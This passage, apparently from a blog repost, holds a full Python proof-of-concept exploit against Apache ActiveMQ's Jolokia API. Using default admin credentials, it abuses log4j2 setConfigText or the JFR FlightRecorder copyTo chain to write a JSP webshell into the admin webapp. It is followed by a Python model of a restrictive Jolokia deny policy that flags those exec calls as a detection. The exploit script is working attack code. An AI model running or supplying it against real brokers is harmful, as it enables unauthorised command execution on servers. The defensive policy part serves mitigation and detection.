value="999 d"/></condition><selection name="exception-level" default="errors" label="Exceptions"><option label="Off" name="off">off</option><option label="Errors Only" name="errors">errors</option><option label="All Exceptions, including Errors" name="all">all</option></selection><condition name="enable-errors" true="true" false="false"><or><test name="exception-level" operator="equal" value="errors"/><test name="exception-level" operator="equal" value="all"/></or></condition><condition name="enable-exceptions" true="true" false="false"><test name="exception-level" operator="equal" value="all"/></condition><selection name="memory-leak-detection" default="minimal" label="Memory Leak Detection"><option label="Off" name="off">off</option><option label="Object Types" name="minimal">minimal</option><option label="Object Types + Allocation Stack Traces" name="medium">medium</option><option label="Object Types + Allocation Stack Traces + Path to GC Root" name="full">full</option></selection><condition name="memory-leak-detection-enabled" true="false" false="true"><test name="memory-leak-detection" operator="equal" value="off"/></condition><condition name="memory-leak-detection-stack-trace" true="true" false="false"><or><test name="memory-leak-detection" operator="equal" value="medium"/><test name="memory-leak-detection" operator="equal" value="full"/></or></condition><condition name="memory-leak-detection-cutoff" true="1 h" false="0 ns"><test name="memory-leak-detection" operator="equal" value="full"/></condition><text name="synchronization-threshold" label="Synchronization Threshold" contentType="timespan" minimum="0 s">20 ms</text><text name="file-io-threshold" label="File I/O Threshold" contentType="timespan" minimum="0 s">20 ms</text><text name="socket-io-threshold" label="Socket I/O Threshold" contentType="timespan" minimum="0 s">20 ms</text><flag name="class-loading-enabled" label="Class Loading">false</flag></control></configuration>
'''


class Application(object):
    def __init__(self, url, username, password):
        self.url = url
        self.session = requests.session()
        self.session.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
                          'Chrome/117.0.5938.132 Safari/537.36',
            'Origin': url,
        }
        # Jolokia sits behind the ActiveMQ web console's HTTP basic auth
        self.session.auth = (username, password)

    def request(self, method: str, path: str, *args, **kwargs):
        data = self.session.request(method, urljoin(self.url, path), *args, **kwargs).json()
        # Jolokia reports errors in the JSON body, not via the HTTP status
        assert data['status'] == 200
        return data

    def find_mbean_name(self):
        # Enumerate MBeans through Jolokia's "list" command and pick the log4j2
        # MBean if present, otherwise the JFR FlightRecorder MXBean (JDK 11+)
        data = self.request('GET', '/api/jolokia/list')
        for name, val in data['value'].items():
            if name == 'org.apache.logging.log4j2':
                for type_name in val.keys():
                    if type_name.startswith('type='):
                        return f'{name}:{type_name}'

        for name, val in data['value'].items():
            if name == 'jdk.management.jfr':
                for type_name in val.keys():
                    if type_name == 'type=FlightRecorder':
                        return f'{name}:{type_name}'

        raise Exception('No mbean whose name is org.apache.logging.log4j2 or jdk.management.jfr')

    def modify_config(self, mbean: str, template: str):
        # log4j2 variant: replace the logging configuration via setConfigText
        self.request('POST', '/api/jolokia/', json=dict(
            type='exec',
            mbean=mbean,
            operation='setConfigText',
            arguments=[template, 'utf-8']
        ))

    def exploit_log4j(self, mbean: str):
        self.modify_config(mbean, evil_template)
        logging.info('update log config')
        # the evil template logs request headers to a .jsp under the admin webapp,
        # so the webshell travels in the User-Agent header
        self.request('GET', '/api/jolokia/version', headers={'User-Agent': f'Mozilla ||| {webshell} |||'})
        logging.info('write webshell to %s', urljoin(self.url, '/admin/shell.jsp?cmd=id'))
        self.modify_config(mbean, original_template)
        logging.info('restore log config')

    def exploit_jfr(self):
        # JFR variant: newRecording -> setConfiguration -> startRecording ->
        # stopRecording -> copyTo, exactly the chain in the advisory
        record_id = self.create_record()
        logging.info('create flight record, id = %d', record_id)
        # record_template is the JFC settings XML with JSP code hidden in setting names
        self.request('POST', '/api/jolokia/', json=dict(
            type='exec',
            mbean='jdk.management.jfr:type=FlightRecorder',
            operation='setConfiguration',
            arguments=[record_id, record_template]
        ))
        logging.info('update configuration for record %d', record_id)
        self.request('POST', '/api/jolokia/', json=dict(
            type='exec',
            mbean='jdk.management.jfr:type=FlightRecorder',
            operation='startRecording',
            arguments=[record_id]
        ))
        logging.info('start record')
        time.sleep(1)
        self.request('POST', '/api/jolokia/', json=dict(
            type='exec',
            mbean='jdk.management.jfr:type=FlightRecorder',
            operation='stopRecording',
            arguments=[record_id]
        ))
        logging.info('stop record')
        # copyTo writes the recording (settings text included) to a path relative
        # to the broker's working directory; the admin webapp serves it as JSP
        self.request('POST', '/api/jolokia/', json=dict(
            type='exec',
            mbean='jdk.management.jfr:type=FlightRecorder',
            operation='copyTo',
            arguments=[record_id, 'webapps/admin/shelljfr.jsp']
        ))
        logging.info('write webshell to %s', urljoin(self.url, '/admin/shelljfr.jsp?cmd=id'))

    def exploit(self, action='auto'):
        mbean = self.find_mbean_name()
        if action == 'log4j':
            logging.info('choice MBean org.apache.logging.log4j2 manually')
            self.exploit_log4j(mbean)
        elif action == 'jfr':
            logging.info('choice MBean jdk.management.jfr:type=FlightRecorder manually')
            self.exploit_jfr()
        elif mbean.startswith('org.apache.logging.log4j2'):
            logging.info('choice MBean %r automatically', mbean)
            self.exploit_log4j(mbean)
        else:
            logging.info('choice MBean %r automatically', mbean)
            self.exploit_jfr()

    def create_record(self):
        data = self.request('POST', '/api/jolokia/', json=dict(
            type='exec',
            mbean='jdk.management.jfr:type=FlightRecorder',
            operation='newRecording',
            arguments=[]
        ))
        return data['value']


def main():
    parser = argparse.ArgumentParser(description='Attack Apache ActiveMQ')
    parser.add_argument('--username', '-u', type=str, default='admin', help='Username for the ActiveMQ console')
    parser.add_argument('--password', '-p', type=str, default='admin', help='Password for the ActiveMQ console')
    parser.add_argument('--exploit', '-e', type=str, default='auto', choices=['auto', 'log4j', 'jfr'], help='Exploit')
    parser.add_argument('url', type=str)
    args = parser.parse_args()

    app = Application(args.url, args.username, args.password)
    app.exploit(args.exploit)


if __name__ == '__main__':
    main()
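The advisory's fix is not a code patch but a more restrictive Jolokia access policy. The following is an added example, not code from this write-up or its PoC script: it models that restriction in Python, evaluates Jolokia requests (POST JSON bodies, Jolokia bulk arrays, and GET-style URLs) against a deny list, and runs the exact exec sequence the PoC sends through it so the denied steps can be seen. The deny entries, ALLOWED_COMMANDS, the sample bodies and the log4j2 MBean name `type=6d6f6e28` are constructed assumptions for illustration; they are not a copy of the jolokia-access.xml that the fixed ActiveMQ releases ship.

```python
import fnmatch
import json
from urllib.parse import unquote

# Assumed deny policy, modelled on the two MBeans this write-up abuses. It is
# the shape of a Jolokia <deny> section expressed in Python, NOT a copy of the
# jolokia-access.xml shipped with ActiveMQ 5.16.6 / 5.17.4 / 5.18.0.
DENY_POLICY = {
    # MBean name pattern                     : denied operation patterns
    "jdk.management.jfr:type=FlightRecorder": ["*"],
    "org.apache.logging.log4j2:*": ["setConfigText", "setConfigLocation"],
}

# Request types permitted at all (Jolokia's <commands> section, assumed here).
# exec stays enabled so the per-MBean deny rules are what breaks the chain.
ALLOWED_COMMANDS = {"read", "list", "search", "version", "exec"}


def _denied(mbean: str, operation: str) -> bool:
    """True if (mbean, operation) matches any DENY_POLICY entry."""
    for name_pat, op_pats in DENY_POLICY.items():
        if fnmatch.fnmatchcase(mbean, name_pat) and any(
            fnmatch.fnmatchcase(operation, op) for op in op_pats
        ):
            return True
    return False


def evaluate(req: dict) -> tuple:
    """Decide a single Jolokia request dict: (allowed, reason)."""
    cmd = req.get("type", "")
    if cmd not in ALLOWED_COMMANDS:
        return False, f"command {cmd!r} not allowed"
    if cmd == "exec":
        mbean, op = req.get("mbean", ""), req.get("operation", "")
        if _denied(mbean, op):
            return False, f"exec {mbean} {op} denied by policy"
        return True, f"exec {mbean} {op} permitted"
    return True, f"{cmd} permitted"


def parse_get_path(path: str) -> dict:
    """Map a GET URL /api/jolokia/<type>/<mbean>/<operation>/... onto the same
    dict shape as a POST body. Assumes the plain form without Jolokia's '!'
    escaping of '/' inside names."""
    _, found, tail = path.partition("/api/jolokia")
    if not found:
        raise ValueError("not a Jolokia path")
    tail = tail.strip("/")
    parts = [unquote(p) for p in tail.split("/")] if tail else []
    req = {"type": parts[0] if parts else "version"}  # bare /api/jolokia/ means "version"
    if req["type"] in ("read", "write", "exec") and len(parts) > 1:
        req["mbean"] = parts[1]
    if req["type"] == "exec" and len(parts) > 2:
        req["operation"] = parts[2]
    return req


def audit(bodies: list) -> list:
    """Run captured POST bodies (single request or Jolokia bulk array) through the
    policy; return (body_index, reason) for every request that would be denied."""
    findings = []
    for i, body in enumerate(bodies):
        data = json.loads(body)
        for req in (data if isinstance(data, list) else [data]):
            allowed, reason = evaluate(req)
            if not allowed:
                findings.append((i, reason))
    return findings


JFR = "jdk.management.jfr:type=FlightRecorder"

# Constructed sample traffic: the exec sequence the PoC above sends, one bulk
# request, the log4j2 variant, and a harmless attribute read.
SAMPLE_BODIES = [
    json.dumps({"type": "exec", "mbean": JFR, "operation": "newRecording", "arguments": []}),
    json.dumps({"type": "exec", "mbean": JFR, "operation": "setConfiguration",
                "arguments": [1, "<configuration version=\"2.0\"/>"]}),
    json.dumps([  # bulk POST: two requests in one body
        {"type": "exec", "mbean": JFR, "operation": "startRecording", "arguments": [1]},
        {"type": "exec", "mbean": JFR, "operation": "stopRecording", "arguments": [1]},
    ]),
    json.dumps({"type": "exec", "mbean": JFR, "operation": "copyTo",
                "arguments": [1, "webapps/admin/shelljfr.jsp"]}),
    json.dumps({"type": "exec", "mbean": "org.apache.logging.log4j2:type=6d6f6e28",  # constructed name
                "operation": "setConfigText", "arguments": ["<Configuration/>", "utf-8"]}),
    json.dumps({"type": "read", "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
                "attribute": "TotalMessageCount"}),
]

if __name__ == "__main__":
    for idx, reason in audit(SAMPLE_BODIES):
        print(f"body[{idx}] {reason}")
    print(evaluate(parse_get_path(f"/api/jolokia/exec/{JFR}/copyTo/1/webapps/admin/x.jsp")))
```

Every exec step of the JFR chain and the log4j2 setConfigText call is rejected while the broker attribute read still passes, which is the point of restricting Jolokia rather than disabling it. The same evaluation, fed with request bodies captured by a reverse proxy or WAF, doubles as a detection for the chain on instances that have not yet been upgraded.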

http://www.ppmy.cn/embedded/149623.html
